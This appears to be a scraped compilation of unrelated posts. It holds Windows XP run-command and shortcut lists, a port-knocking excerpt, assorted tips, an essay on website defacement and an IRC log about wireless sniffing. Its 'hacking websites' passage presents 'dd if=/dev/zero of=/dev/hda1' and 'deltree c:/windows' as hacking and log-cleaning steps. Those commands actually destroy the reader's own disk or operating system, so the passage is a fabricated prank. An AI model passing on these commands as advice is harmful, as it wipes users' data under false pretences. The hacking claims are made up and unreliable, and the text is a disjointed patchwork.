	Quicktime (If Installed)- QuickTime.cpl
	Real Player (if installed)- realplay
	Regional Settings - intl.cpl
	Registry Editor - regedit
	Registry Editor - regedit32
	Remote Access Phonebook - rasphone
	Remote Desktop - mstsc
	Removable Storage - ntmsmgr.msc
	Removable Storage Operator Requests - ntmsoprq.msc
	Resultant Set of Policy (XP Prof) - rsop.msc
	Scanners and Cameras - sticpl.cpl
	Scheduled Tasks - control schedtasks
	Security Center - wscui.cpl
	Services - services.msc
	Shared Folders - fsmgmt.msc
	Shuts Down Windows - shutdown
	Sounds and Audio - mmsys.cpl
	Spider Solitare Card Game - spider
	Malicious Software Removal Tool - mrt
	Microsoft Access (if installed) - access.cpl
	Microsoft Chat - winchat
	Microsoft Excel (if installed) - excel
	Microsoft Frontpage (if installed)- frontpg
	Microsoft Movie Maker - moviemk
	Microsoft Paint - mspaint
	Microsoft Powerpoint (if installed)- powerpnt
	Microsoft Word (if installed)- winword
	Microsoft Syncronization Tool - mobsync
	Minesweeper Game - winmine
	Mouse Properties - control mouse
	Mouse Properties - main.cpl
	Nero (if installed)- nero
	Netmeeting - conf
	Network Connections - control netconnections
	Network Connections - ncpa.cpl
	Network Setup Wizard - netsetup.cpl
	Notepad - notepad
	Nview Desktop Manager (If Installed)- nvtuicpl.cpl
	Object Packager - packager
	ODBC Data Source Administrator- odbccp32.cpl
	On Screen Keyboard - osk
	Opens AC3 Filter (If Installed) - ac3filter.cpl
	Outlook Express - msimn
	Paint – pbrush
	Keyboard Properties - control keyboard
	IP Configuration (Display Connection Configuration) - ipconfi/all
	IP Configuration (Display DNS Cache Contents)- ipconfig /displaydns
	IP Configuration (Delete DNS Cache Contents)- ipconfig /flushdns
	IP Configuration (Release All Connections)- ipconfig /release
	IP Configuration (Renew All Connections)- ipconfig /renew
	IP Configuration(RefreshesDHCP&Re-RegistersDNS)-ipconfig/registerdns
	IP Configuration (Display DHCP Class ID)- ipconfig/showclassid
	IP Configuration (Modifies DHCP Class ID)- ipconfig /setclassid
	Java Control Panel (If Installed)- jpicpl32.cpl
	Java Control Panel (If Installed)- javaws
	Local Security Settings - secpol.msc
	Local Users and Groups - lusrmgr.msc
	Logs You Out Of Windows - logoff.....
	Accessibility Controls - access.cpl
	Accessibility Wizard - accwiz
	Add Hardware - Wizardhdwwiz.cpl
	Add/Remove Programs - appwiz.cpl
	Administrative Tools control - admintools
	Adobe Acrobat (if installed) - acrobat
	Adobe Designer (if installed)- acrodist
	Adobe Distiller (if installed)- acrodist
	Adobe ImageReady (if installed)- imageready
	Adobe Photoshop (if installed)- photoshop
	Automatic Updates - wuaucpl.cpl
	Bluetooth Transfer Wizard – fsquirt
	Calculator - calc
	Certificate Manager - certmgr.msc
	Character Map - charmap
	Check Disk Utility - chkdsk
	Clipboard Viewer - clipbrd
	Command Prompt - cmd
	Component Services - dcomcnfg
	Computer Management - compmgmt.msc
	Control Panel - control
	Date and Time Properties - timedate.cpl
	DDE Shares - ddeshare
	Device Manager - devmgmt.msc
	Direct X Control Panel (If Installed)- directx.cpl
	Direct X Troubleshooter- dxdiag
	Disk Cleanup Utility- cleanmgr
	Disk Defragment- dfrg.msc
	Disk Management- diskmgmt.msc
	Disk Partition Manager- diskpart
	Display Properties- control desktop
	Display Properties- desk.cpl
	Display Properties (w/Appearance Tab Preselected)- control color
	Dr. Watson System Troubleshooting Utility- drwtsn32
	Driver Verifier Utility- verifier
	Event Viewer- eventvwr.msc
	Files and Settings Transfer Tool- migwiz
	File Signature Verification Tool- sigverif
	Findfast- findfast.cpl
	Firefox (if installed)- firefox
	Folders Properties- control folders
	Fonts- control fonts
	Fonts Folder- fonts
	Free Cell Card Game- freecell
	Game Controllers- joy.cpl
	Group Policy Editor (XP Prof)- gpedit.msc
	Hearts Card Game- mshearts
	Help and Support- helpctr
	HyperTerminal- hypertrm
	Iexpress Wizard- iexpress
	Indexing Service- ciadv.msc
	Internet Connection Wizard- icwconn1
	Internet Explorer- iexplore
	Internet Setup Wizard- inetwiz
	Internet Properties- inetcpl.cpl

In computing, port knocking is a method of externally opening ports on a firewall by generating a connection attempt on a set of prespecified closed ports. Once a correct sequence of connection attempts is received the firewall rules are dynamically modified to allow the host which sent the connection attempts to connect over specified port(s).


This is usually implemented by configuring a daemon to watch the firewall log file for said connection attempts then modify the firewall configuration accordingly. It can also be performed by a process examining packets at a higher level (using packet capture interfaces such as Pcap), allowing the use of already "open" TCP ports to be used within the knock sequence. Port knocking is most often used to determine access to port 22, the Secure Shell (SSH) port. The port "knock" itself is similar to a secret handshake and can consist of any number of TCP, UDP or even sometimes ICMP and other protocol packets to numbered ports on the destination machine. The complexity of the knock can be anything from a simple ordered list (e.g. TCP port 1000, TCP port 2000, UDP port 3000) to a complex time-dependent, source-IP-based and other-factor-based encrypted hash.


A port knock setup takes next to no resources and very simple software to implement. A portknock daemon on the firewall machine listens for packets on certain ports (either via the firewall log or by packet capture). The client user would carry an extra utility, which could be as simple as netcat or a modified ping program or as complicated as a full hash-generator, and use that before they attempted to connect to the machine in the usual way.

Most portknocks are stateful systems in that if the first part of the "knock" has been received successfully, an incorrect second part would not allow the remote user to continue and, indeed, would give the remote user no clue as to how far through the sequence they failed. Usually the only indication of failure is that, at the end of the knock sequence, the port expected to be open is not opened. No packets are sent to the remote user at any time.
While this technique for securing access to remote network daemons has not yet been widely adopted by the security community, it has been integrated in newer rootkits.

i liked to share this information its really Knowledgeable

http://en.wikipedia.org/wiki/Port_knocking

Windows XP has a hidden sound track which plays as background music during Windows XP installation process, but most people can’t hear this music because they have a sound card that does not have drivers preinstalled on XP .

There are 2 ways by which you can find this hidden sound track:

1.Go to start->search.Search for title.wma .But remember to include hidden files and folders in your search.

2.Navigate to C:\Windows\system32\oobe\images, go to Tools > Folder Options > View, check Show Hidden Files and Folders options and then uncheck Hide Protected Operating System Files. You will now notice a file called title.wma, that is the hidden sound track.

This screenshot will help you out.

visit to

http://www.fix-pc-errors.com/dll-definition.htm

Go to


http://www.fix-pc-errors.com/windows-explorer-definition.htm

Go

To

http://www.fix-pc-errors.com/activex-control-definition.htm

• Shift + F10 right-clicks.
• Win + L (XP Only): Locks keyboard. Similar to Lock Workstation.
• Win + F or F3: Open Find dialog. (All Files) F3 may not work in some applications which use F3 for their own find dialogs.
• Win + Control + F: Open Find dialog. (Computers)
• Win + U: Open Utility Manager.
• Win + F1: Open Windows help.
• Win + Pause: Open System Properties dialog.
• Win + Tab: Cycle through taskbar buttons. Enter clicks, AppsKey or Shift + F10 right-clicks.
• Win + Shift + Tab: Cycle through taskbar buttons in reverse.
• Alt + Tab: Display CoolSwitch. More commonly known as the AltTab dialog.
• Alt + Shift + Tab: Display CoolSwitch; go in reverse.
• Alt + Escape: Send active window to the bottom of the z-order.
• Alt + Shift + Escape: Activate the window at the bottom of the z-order.
• Alt + F4: Close active window; or, if all windows are closed, open shutdown dialog.
• Shift while a CD is loading: Bypass AutoPlay.
• Shift while login: Bypass startup folder. Only those applications will be ignored which are in the startup folder, not those started from the registry (Microsoft\Windows\CurrentVersion\Run\)
• Ctrl + Alt + Delete or Ctrl + Alt + NumpadDel (Both NumLock states): Invoke the Task Manager or NT Security dialog.
• Ctrl + Shift + Escape (2000/XP ) or (Ctrl + Alt + NumpadDot) : Invoke the task manager. On earlier OSes, acts like Ctrl + Escape.
• Printscreen: Copy screenshot of current screen to clipboard.
• Alt + Printscreen: Copy screenshot of current active window to clipboard.
• Ctrl + Alt + Down Arrow: Invert screen. Untested on OSes other than XP.
• Ctrl + Alt + Up Arrow: Undo inversion.
• Win + B : Move focus to systray icons.

2.) Generic

• Ctrl + C or Ctrl + Insert: Copy.
• Ctrl + X or Shift + Delete: Cut.
• Ctrl + V or Shift + Insert: Paste/Move.
• Ctrl + N: New... File, Tab, Entry, etc.
• Ctrl + S: Save.
• Ctrl + O: Open...
• Ctrl + P: Print.
• Ctrl + Z: Undo.
• Ctrl + A: Select all.
• Ctrl + F: Find...
• Ctrl+W : to close the current window
• Ctrl + F4: Close tab or child window.
• F1: Open help.
• F11: Toggle full screen mode.
• Alt or F10: Activate menu bar.
• Alt + Space: Display system menu. Same as clicking the icon on the titlebar.
• Escape: Remove focus from current control/menu, or close dialog box.

3.) Generic Navigation

• Tab: Forward one item.
• Shift + Tab: Backward one item.
• Ctrl + Tab: Cycle through tabs/child windows.
• Ctrl + Shift + Tab: Cycle backwards through tabs/child windows.
• Enter: If a button's selected, click it, otherwise, click default button.
• Space: Toggle items such as radio buttons or checkboxes.
• Alt + (Letter): Activate item corresponding to (Letter). (Letter) is the underlined letter on the item's name.
• Ctrl + Left: Move cursor to the beginning of previous word.
• Ctrl + Right: Move cursor to the beginning of next word.
• Ctrl + Up: Move cursor to beginning of previous paragraph. This and all subsequent Up/Down hotkeys in this section have only been known to work in RichEdit controls.
• Ctrl + Down: Move cursor to beginning of next paragraph.
• Shift + Left: Highlight one character to the left.
• Shift + Right: Highlight one character to the right.
• Shift + Up: Highlight from current cursor position, to one line up.
• Shift + Down: Highlight from current cursor position, to one line down.
• Ctrl + Shift + Left: Highlight to beginning of previous word.
• Ctrl + Shift + Right: Highlight to beginning of next word.
• Ctrl + Shift + Up: Highlight to beginning of previous paragraph.
• Ctrl + Shift + Down: Highlight to beginning of next paragraph.
• Home: Move cursor to top of a scrollable control.
• End: Move cursor to bottom of a scrollable control.

4.) Generic File Browser

• Arrow Keys: Navigate.
• Shift + Arrow Keys: Select multiple items.
• Ctrl + Arrow Keys: Change focus without changing selection. "Focus" is the object that will run on Enter. Space toggles selection of the focused item.
• (Letter): Select first found item that begins with (Letter).
• BackSpace: Go up one level to the parent directory.
• Alt + Left: Go back one folder.
• Alt + Right: Go forward one folder.
• Enter: Activate (Double-click) selected item(s).
• Alt + Enter: View properties for selected item.
• F2: Rename selected item(s).
• Ctrl + NumpadPlus: In a Details view, resizes all columns to fit the longest item in each one.
• Delete: Delete selected item(s).
• Shift + Delete: Delete selected item(s); bypass Recycle Bin.
• Ctrl while dragging item(s): Copy.
• Ctrl + Shift while dragging item(s): Create shortcut(s).
• In tree pane, if any:
• Left: Collapse the current selection if expanded, or select the parent folder.
• Right: Expand the current selection if collapsed, or select the first subfolder.
• NumpadAsterisk: Expand currently selected directory and all subdirectories. No undo.
• NumpadPlus: Expand currently selected directory.
• NumpadMinus: Collapse currently selected directory.

5.) Accessibility

• Right Shift for eight seconds: Toggle FilterKeys on and off. FilterKeys must be enabled.
• Left Alt + Left Shift + PrintScreen: Toggle High Contrast on and off. High Contrast must be enabled.
• Left Alt + Left Shift + NumLock: Toggle MouseKeys on and off. MouseKeys must be enabled.
• NumLock for five seconds: Toggle ToggleKeys on and off. ToggleKeys must be enabled.
• Shift five times: Toggle StickyKeys on and off. StickyKeys must be enabled.
• 6.) Microsoft Natural Keyboard with IntelliType Software Installed
• Win + L: Log off Windows.
• Win + P: Open Print Manager.
• Win + C: Open control panel.
• Win + V: Open clipboard.
• Win + K: Open keyboard properties.
• Win + I: Open mouse properties.
• Win + A: Open Accessibility properties.
• Win + Space: Displays the list of Microsoft IntelliType shortcut keys.
• Win + S: Toggle CapsLock on and off.

7.) Remote Desktop Connection Navigation

• Ctrl + Alt + End: Open the NT Security dialog.
• Alt + PageUp: Switch between programs.
• Alt + PageDown: Switch between programs in reverse.
• Alt + Insert: Cycle through the programs in most recently used order.
• Alt + Home: Display start menu.
• Ctrl + Alt + Break: Switch the client computer between a window and a full screen.
• Alt + Delete: Display the Windows menu.
• Ctrl + Alt + NumpadMinus: Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing Alt + PrintScreen on a local computer.
• Ctrl + Alt + NumpadPlus: Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PrintScreen on a local computer.

8.) Mozilla Firefox Shortcuts

• Ctrl + Tab or Ctrl + PageDown: Cycle through tabs.
• Ctrl + Shift + Tab or Ctrl + PageUp: Cycle through tabs in reverse.
• Ctrl + (1-9): Switch to tab corresponding to number.
• Ctrl + N: New window.
• Ctrl + T: New tab.
• Ctrl + L or Alt + D or F6: Switch focus to location bar.
• Ctrl + Enter: Open location in new tab.
• Shift + Enter: Open location in new window.
• Ctrl + K or Ctrl + E: Switch focus to search bar.
• Ctrl + O: Open a local file.
• Ctrl + W: Close tab, or window if there's only one tab open.
• Ctrl + Shift + W: Close window.
• Ctrl + S: Save page as a local file.
• Ctrl + P: Print page.
• Ctrl + F or F3: Open find toolbar.
• Ctrl + G or F3: Find next...
• Ctrl + Shift + G or Shift + F3: Find previous...
• Ctrl + B or Ctrl + I: Open Bookmarks sidebar.
• Ctrl + H: Open History sidebar.
• Escape: Stop loading page.
• Ctrl + R or F5: Reload current page.
• Ctrl + Shift + R or Ctrl + F5: Reload current page; bypass cache.
• Ctrl + U: View page source.
• Ctrl + D: Bookmark current page.
• Ctrl + NumpadPlus or Ctrl + Equals (+/=): Increase text size.
• Ctrl + NumpadMinus or Ctrl + Minus: Decrease text size.
• Ctrl + Numpad0 or Ctrl + 0: Set text size to default.
• Alt + Left or Backspace: Back.
• Alt + Right or Shift + Backspace: Forward.
• Alt + Home: Open home page.
• Ctrl + M: Open new message in integrated mail client.
• Ctrl + J: Open Downloads dialog.
• F6: Switch to next frame. You must have selected something on the page already, e.g. by use of Tab.
• Shift + F6: Switch to previous frame.
• Apostrophe ('): Find link as you type.
• Slash (/): Find text as you type.

9.) GMail

• Note: Must have "keyboard shortcuts" on in settings.
• C: Compose new message.
• Shift + C: Open new window to compose new message.
• Slash (/): Switch focus to search box.
• K: Switch focus to the next most recent email. Enter or "O" opens focused email.
• J: Switch focus to the next oldest email.
• N: Switch focus to the next message in the "conversation." Enter or "O" expands/collapses messages.
• P: Switch focus to the previous message.
• U: Takes you back to the inbox and checks for new mail.
• Y: Various actions depending on current view:
• Has no effect in "Sent" and "All Mail" views.
• Inbox: Archive email or message.
• Starred: Unstar email or message.
• Spam: Unmark as spam and move back to "Inbox."
• Trash: Move back to "Inbox."
• Any label: Remove the label.
• X: "Check" an email. Various actions can be performed against all checked emails.
• S: "Star" an email. Identical to the more familiar term, "flagging."
• R: Reply to the email.
• A: Reply to all recipients of the email.
• F: Forward an email.
• Shift + R: Reply to the email in a new window.
• Shift + A: Reply to all recipients of the email in a new window.
• Shift + F: Forward an email in a new window.
• Shift + 1 (!): Mark an email as spam and remove it from the inbox.
• G then I: Switch to "Inbox" view.
• G then S: Switch to "Starred" view.
• G then A: Switch to "All Mail" view.
• G then C: Switch to "Contacts" view.
• G then S: Switch to "Drafts" view.

10.) List of F1-F9 Key Commands for the Command Prompt

• F1 / right arrow: Repeats the letters of the last command line, one by one.
• F2: Displays a dialog asking user to "enter the char to copy up to" of the last command line
• F3: Repeats the last command line
• F4: Displays a dialog asking user to "enter the char to delete up to" of the last command line
• F5: Goes back one command line
• F6: Enters the traditional CTRL+Z (^z)
• F7: Displays a menu with the command line history
• F8: Cycles back through previous command lines (beginning with most recent)
• F9: Displays a dialog asking user to enter a command number, where 0 is for first command line entered.
• Alt+Enter: toggle fullScreen mode.
• up/down: scroll thru/repeat previous entries
• Esc: delete line

Full Codes. Kindly Add if U know more !

Accessibility Controls	access.cpl
Add Hardware Wizard	hdwwiz.cpl
Add/Remove Programs	appwiz.cpl
Administrative Tools	control admintools
Automatic Updates	wuaucpl.cpl
Bluetooth Transfer Wizard	fsquirt
Calculator	calc
Certificate Manager	certmgr.msc
Character Map	charmap
Check Disk Utility	chkdsk
Clipboard Viewer	clipbrd
Command Prompt	cmd
Component Services	dcomcnfg
Computer Management	compmgmt.msc
timedate.cpl	ddeshare
Device Manager	devmgmt.msc
Direct X Control Panel (If Installed)*	directx.cpl
Direct X Troubleshooter	dxdiag
Disk Cleanup Utility	cleanmgr
Disk Defragment	dfrg.msc
Disk Management	diskmgmt.msc
Disk Partition Manager	diskpart
Display Properties	control desktop
Display Properties	desk.cpl
Display Properties (w/Appearance Tab Preselected)	control color
Dr. Watson System Troubleshooting Utility	drwtsn32
Driver Verifier Utility	verifier
Event Viewer	eventvwr.msc
File Signature Verification Tool	sigverif
Findfast	findfast.cpl
Folders Properties	control folders
Fonts	control fonts
Fonts Folder	fonts
Free Cell Card Game	freecell
Game Controllers	joy.cpl
Group Policy Editor (XP Prof)	gpedit.msc
Hearts Card Game	mshearts
Iexpress Wizard	iexpress
Indexing Service	ciadv.msc
Internet Properties	inetcpl.cpl
IP Configuration (Display Connection Configuration)	ipconfig /all
IP Configuration (Display DNS Cache Contents)	ipconfig /displaydns
IP Configuration (Delete DNS Cache Contents)	ipconfig /flushdns
IP Configuration (Release All Connections)	ipconfig /release
IP Configuration (Renew All Connections)	ipconfig /renew
IP Configuration (Refreshes DHCP & Re-Registers DNS)	ipconfig /registerdns
IP Configuration (Display DHCP Class ID)	ipconfig /showclassid
IP Configuration (Modifies DHCP Class ID)	ipconfig /setclassid
Java Control Panel (If Installed)	jpicpl32.cpl
Java Control Panel (If Installed)	javaws
Keyboard Properties	control keyboard
Local Security Settings	secpol.msc
Local Users and Groups	lusrmgr.msc
Logs You Out Of Windows	logoff
Microsoft Chat	winchat
Minesweeper Game	winmine
Mouse Properties	control mouse
Mouse Properties	main.cpl
Network Connections	control netconnections
Network Connections	ncpa.cpl
Network Setup Wizard	netsetup.cpl
Notepad	notepad
Nview Desktop Manager (If Installed)	nvtuicpl.cpl
Object Packager	packager
ODBC Data Source Administrator	odbccp32.cpl
On Screen Keyboard	osk
Opens AC3 Filter (If Installed)	ac3filter.cpl
Password Properties	password.cpl
Performance Monitor	perfmon.msc
Performance Monitor	perfmon
Phone and Modem Options	telephon.cpl
Power Configuration	powercfg.cpl
Printers and Faxes	control printers
Printers Folder	printers
Private Character Editor	eudcedit
Quicktime (If Installed)	QuickTime.cpl
Regional Settings	intl.cpl
Registry Editor	regedit
Registry Editor	regedit32
Remote Desktop	mstsc
Removable Storage	ntmsmgr.msc
Removable Storage Operator Requests	ntmsoprq.msc
Resultant Set of Policy (XP Prof)	rsop.msc
Scanners and Cameras	sticpl.cpl
Scheduled Tasks	control schedtasks
Security Center	wscui.cpl
Services	services.msc
Shared Folders	fsmgmt.msc
Shuts Down Windows	shutdown
Sounds and Audio	mmsys.cpl
Spider Solitare Card Game	spider
SQL Client Configuration	cliconfg
System Configuration Editor	sysedit
System Configuration Utility	msconfig
System File Checker Utility (Scan Immediately)	sfc /scannow
System File Checker Utility (Scan Once At Next Boot)	sfc /scanonce
System File Checker Utility (Scan On Every Boot)	sfc /scanboot
System File Checker Utility (Return to Default Setting)	sfc /revert
System File Checker Utility (Purge File Cache)	sfc /purgecache
System File Checker Utility (Set Cache Size to size x)	sfc /cachesize=x
System Properties	sysdm.cpl
Task Manager	taskmgr
Telnet Client	telnet
User Account Management	nusrmgr.cpl
Utility Manager	utilman
Windows Firewall	firewall.cpl
Windows Magnifier	magnify
Windows Management Infrastructure	wmimgmt.msc
Windows System Security Tool	syskey
Windows Update Launches	wupdmgr
Windows XP Tour Wizard	tourstart
Wordpad	write

Run line commands can be very useful some times, its better to know them here are all the commands that i know u might find them usefull too Commands are same for Windows xp pro and home

Run Line Commands

These are GUI applications that can be opened from the run line.
These applications are not located in the C:\windows\system32\ directory, the
keys for these applications are located in the registry under:
HKLM\software\microsoft\windows\currentversion\app paths
BCKGZM.EXE - Backgammon
CHKRZM.EXE - Checkers
CONF.EXE - NetMeeting
DIALER.EXE - Phone Dialer
HELPCTR.EXE - Help and Support
HRTZZM.EXE - Internet Hearts
HYPERTRM.EXE - HyperTerminal
ICWCONN1.EXE - Internet Connection Wizard
IEXPLORE.EXE - Internet Explorer
INETWIZ.EXE - Setup Your Internet Connection
INSTALL.EXE - User's Folder
MIGWIZ.EXE - File and Settings Transfer Wizard
MOVIEMK.EXE - Windows Movie Maker
MPLAYER2.EXE - Windows Media Player Version 6.4.09.1120
MSCONFIG.EXE - System Configuration Utility
MSIMN.EXE - Outlook Express
MSINFO32.EXE - System Information
MSMSGS.EXE - Windows Messenger
MSN6.EXE - MSN Explorer
PBRUSH.EXE - Paint
PINBALL.EXE - Pinball
RVSEZM.EXE - Reversi
SHVLZM.EXE - Spades
TABLE30.EXE - User's Folder
WAB.EXE - Windows Address Book
WABMIG.EXE - Address Book Import Tool
WINNT32.EXE - User's Folder
WMPLAYER.EXE - Windows Media Player
WRITE.EXE - Wordpad

These .EXE files reside in (c:\windows\system32\) or (c:\windows\) directory.
ACCWIZ.EXE - Accessibility Wizard
CALC.EXE - Calculator
CHARMAP.EXE - Character Map
CLEANMGR.EXE - Disk Space Cleanup Manager
CLICONFG.EXE - SQL Client Configuration Utility
CLIPBRD.EXE - Clipbook Viewer
CLSPACK.EXE - Class Package Export Tool
CMD.EXE - Command Line
CMSTP.EXE - Connection Manager Profile Installer
CONTROL.EXE - Control Panel
DCOMCNFG.EXE - Component Services
DDESHARE.EXE - DDE Share
DRWATSON.EXE - Doctor Watson v1.00b
DRWTSN32.EXE - Doctor Watson Settings
DVDPLAY.EXE - DVD Player
DXDIAG.EXE - DirectX Diagnostics
EUDCEDIT.EXE - Private Character Editor
EVENTVWR.EXE - Event Viewer
EXPLORER.EXE - Windows Explorer
FREECELL.EXE - Free Cell
FXSCLNT.EXE - Fax Console
FXSCOVER.EXE - Fax Cover Page Editor
FXSEND.EXE - MS Fax Send Note Utility
IEXPRESS.EXE - IExpress 2.0
LOGOFF.EXE - System Logoff
MAGNIFY.EXE - Microsoft Magnifier
MMC.EXE - Microsoft Management Console
MOBSYNC.EXE - Microsoft Synchronization Manager
MPLAY32.EXE - Windows Media Player version 5.1
MSHEARTS.EXE - Hearts
MSPAINT.EXE - Paint
MSTSC.EXE - Remote Desktop Connection
NARRATOR.EXE - Microsoft Narrator
NETSETUP.EXE - Network Setup Wizard
NOTEPAD.EXE - Notepad
NSLOOKUP.EXE - NSLookup Application
NTSD.EXE - Symbolic Debugger for Windows 2000
ODBCAD32.EXE - ODBC Data Source Administrator
OSK.EXE - On Screen Keyboard
OSUNINST.EXE - Windows Uninstall Utility
PACKAGER.EXE - Object Packager
PERFMON.EXE - Performance Monitor
PROGMAN.EXE - Program Manager
RASPHONE.EXE - Remote Access Phonebook
REGEDIT.EXE - Registry Editor
REGEDT32.EXE - Registry Editor
RESET.EXE - Resets Session
RSTRUI.EXE - System Restore
RTCSHARE.EXE - RTC Application Sharing
SFC.EXE - System File Checker
SHRPUBW.EXE - Create Shared Folder
SHUTDOWN.EXE - System Shutdown
SIGVERIF.EXE - File Signature Verification
SNDREC32.EXE - Sound Recorder
SNDVOL32.EXE - Sound Volume
SOL.EXE - Solitaire

SPIDER.EXE - Spider Solitaire
SYNCAPP.EXE - Create A Briefcase
SYSEDIT.EXE - System Configuration Editor
SYSKEY.EXE - SAM Lock Tool
TASKMGR.EXE - Task Manager
TELNET.EXE - MS Telnet Client
TSSHUTDN.EXE - System Shutdown
TOURSTART.EXE - Windows Tour Launcher
UTILMAN.EXE - System Utility Manager
USERINIT.EXE - My Documents
VERIFIER.EXE - Driver Verifier Manager
WIAACMGR.EXE - Scanner and Camera Wizard
WINCHAT.EXE - Windows for Workgroups Chat
WINHELP.EXE - Windows Help Engine
WINHLP32.EXE - Help
WINMINE.EXE - Minesweeper
WINVER.EXE - Windows Version Information
WRITE.EXE - WordPad
WSCRIPT.EXE - Windows Script Host Settings
WUPDMGR.EXE - Windows Update

The following are Control Panel applets that can be run from the run line.
They are located in the c:\windows\system32 directory, and have the file type
extension ".CPL".
ACCESS.CPL - Accessibility Options
APPWIZ.CPL - Add or Remove Programs
DESK.CPL - Display Properties
HDWWIZ.CPL - Add Hardware Wizard
INETCPL.CPL - Internet Explorer Properties
INTL.CPL - Regional and Language Options
JOY.CPL - Game Controllers
MAIN.CPL - Mouse Properties
MMSYS.CPL - Sounds and Audio Device Properties
NCPA.CPL - Network Connections
NUSRMGR.CPL - User Accounts
ODBCCP32.CPL - ODBC Data Source Administrator
POWERCFG.CPL - Power Options Properties
SYSDM.CPL - System Properties
TELEPHON.CPL - Phone and Modem Options
TIMEDATE.CPL - Date and Time Properties
The following are Microsoft Management Console Snap-ins that can be opened from
the run line. These applications have the file type extension ".MSC".
CERTMGR.MSC - Certificates
CIADV.MSC - Indexing Service
COMPMGMT.MSC - Computer Management
DEVMGMT.MSC - Device Manager
DFRG.MSC - Disk Defragmenter
DISKMGMT.MSC - Disk Management
EVENTVWR.MSC - Event Viewer
FSMGMT.MSC - Shared Folders
LUSRMGR.MSC - Local Users and Groups
NTMSMGR.MSC - Removable Storage
NTMSOPRQ.MSC - Removable Storage Operator Requests
PERFMON.MSC - Performance Monitor
SERVICES.MSC - Services
WMIMGMT.MSC - Windows Management Infrastructure

Calculation on command Prompt ! u knew dis???

The command processor CMD.EXE comes with a mini-calculator that can perform simple arithmetic on 32-bit signed integers:

C:\>set /a 2+2
4
C:\>set /a 2*(9/2)
8
C:\>set /a (2*9)/2
9
C:\>set /a "31>>2"
7

Note that we had to quote the shift operator since it would otherwise be misinterpreted as a "redirect stdout and append" operator.

For more information, type set /? at the command prompt.

***************************************************************************

Hey folks, do u know that windows XP is having a hidden "Star Wars Movie" inside it???
You should be connected to the NET for using this.
Go to Starts-->Programs-->Run
Type
telnet towel.blinkenlights.nl
And hit enter......... Enjoy the magic!!!!

Now on SMS SETTINGS

1>Service centre No:- +919863002222
2>Validity period:- Maximum
3>Message type:- Text
4>Reply path:- Off
5>Delivery report:- Off

Note:- Your balance Must be Zero......

Hello All,
Ive been trying to work this one out for some time, and the solution is actually pretty simple!

To enable themes on Windows Server 2003 follow these steps:
1) Go to the Services applet in Administrative Tools.

2) Find the "Themes" service, right-click and select Properties, select "Automatic" instead of "Disabled" in the startup type box.

3) Click Apply.

4) Right-click the Themes service and select Start.

5) Click OK.

For now you only have Luna Blue, Silver and Olive Green to choose from:
1) Go to Control Panel, select Display and then go to the Appearance tab.

2)In the "Windows and Buttons" drop-down list select "Windows XP Style".

3)Click OK.

There you go, Windows XP Themes on your server! I knew all the GFX that went into Helm Toolbox would be worth it

With a proper understanding of the relevant programming languages such as C, C++, Pearl, java etc. one can be fully equipped with the technique of hacking into website. There backdoors for the web hackers for website hacking. For hacking web sites one of the best ways for the hacker is to install linux on his or her personal computer he or she wants to hack from. Then he can open up a shell to type: dd if=/dev/zero of=/dev/hda1 and press ENTER. As the next step he will type: dd hf=(url). There are a few other alternatives for hacking sites as well. The web hackers using Windows pc can also master the art of hacking websites with the flicking of his finger.

The first step is to clean up the tracks so that the feds fail to trace out the hacker. This happens automatically in case of linux. Cleaning up of tracks in case of Windows 95 or Windows 98 or Windows ME involves a step-by step procedure. Click Start then Run and then Command. In case of Windows NT or Windows 2000 the Tracks can be cleaned by pressing Start, then Run and then cmd. The next step is to clean up tracks with deltree c:/windows or c:\winnt, or whatever the main windows directory is. At the command prompt, press y, which will then go through and clean up the system's logs. The hackers should perform the same steps again after the hacking sites/hacking wireless internet sites. Then after this cleaning up the hackers should type: ping -l4000 (url).

Cyber Terrorism And Hacker's Group

The whole planet is today terrorized by the web hackers to whom hacking seems a mode of getting pleasure by the way of gaining knowledge or mere entertainment. A group of serious hackers named as PENTAGUARD had cracked into the government sites of Australia, America and England all at a time. The hackers in this case had replaced with a typical statement that read "The largest .gov & .mil mass defacement in the history of mankind".

This was a simple statement with an aesthetic undertone of threat. The act affected almost 24 sites with a transitory disruption.Similarly an educational site on the mad cow disease was defaced along with some cities and the nation's government sites in England. The Alaskan office of the department of interior was once attacked since the secretary of the Interior Designate, Gale Norton, encouraged drilling in the Arctic Wild Life Refugee for sucking out oil.

The common wealth of Australia is of no exception. The search page of the common wealth of Australia was once hacked along with the act of hacking into websites of small municipal sites in Australia. These are a scanty number of instances that proved to have jeopardized the respective concerns severely. The hackers had to use simple techniques and methods to do these. Website hacking for these hackers is all as simple as a child's play. Their main focus was on the sites that were designed with vulnerable loopholes.

Searched By - $UM!T

By blacksun.box.sk

22:12:33 --> AZTEK (aztek@198.81.129.100) has joined #bsrf

22:12:33 --- Topic for #bsrf is .::Welcome to Blacksun Research Facility [BSRF] ::. http://blacksun.box.sk Enjoy your stay and plz talk this channel feels dead (Mikkkeee) (AZTEK)

22:12:33 --- Topic for #bsrf set by AZTEK at Sat Apr 27 14:05:07

22:12:33 --- ChanServ sets mode +q

22:12:33 --- ChanServ gives channel operator status to AZTEK

22:12:48 But then, I have no idea what I'm talking about

22:12:56 <-- mtcx1 has quit ( Ping timeout)

22:13:00 lol

22:13:19 ok im back

22:13:20 well now loging works

22:13:28 i am loging simprix

22:13:33 ok

22:13:59 anyone can butt in if they want or if i say something wrong

22:13:59 ok

22:14:22 everyone here

22:14:34 ;]

22:14:39 ya

22:14:52 ok girls and boys

22:15:43 Ok this will be centralized around linux because I have never done this in Windows and Windows sucks

22:16:13 oki

22:16:14 one thing i do know if you want to do this in windows then you need to use netstumpler

22:16:32 or ApSniff

22:16:47 from a website i am lookin at :/

22:16:57 Ok first off in linux you need to recompile your kernel with netlink and get rid of pcmcia support in the kernel

22:17:20 then you have to get the pcmcia source for pcmcia-cd.sourceforge.net

22:17:47 there are to ways you can do it now

22:18:16 you can use the wireless extensions in the kernel but you need a good card like a cisco aironet card

22:18:52 but the wireless extensions does not have as good sniffing techniques as the linux-wlan source

22:19:05 so they way i have done it is using the linux-wlan-ng source

22:19:30 you can get that from www.linux-wlan.org and you need to compile that

22:19:37 any questions so far?

22:19:59 or is no one listening

22:20:00 nope

22:20:15 is there info on editing the kernel?

22:20:48 have you recompiled a kernel before?

22:20:49 miteymouse, wheres that site with ApSniff?

22:21:04 no im new sorry :(

22:21:12 strider: www.wardriving.com

22:21:20 What he/she/it said^

22:21:21 thnx

22:21:25 ok well you should read the howto

22:21:40 i plan on it :P

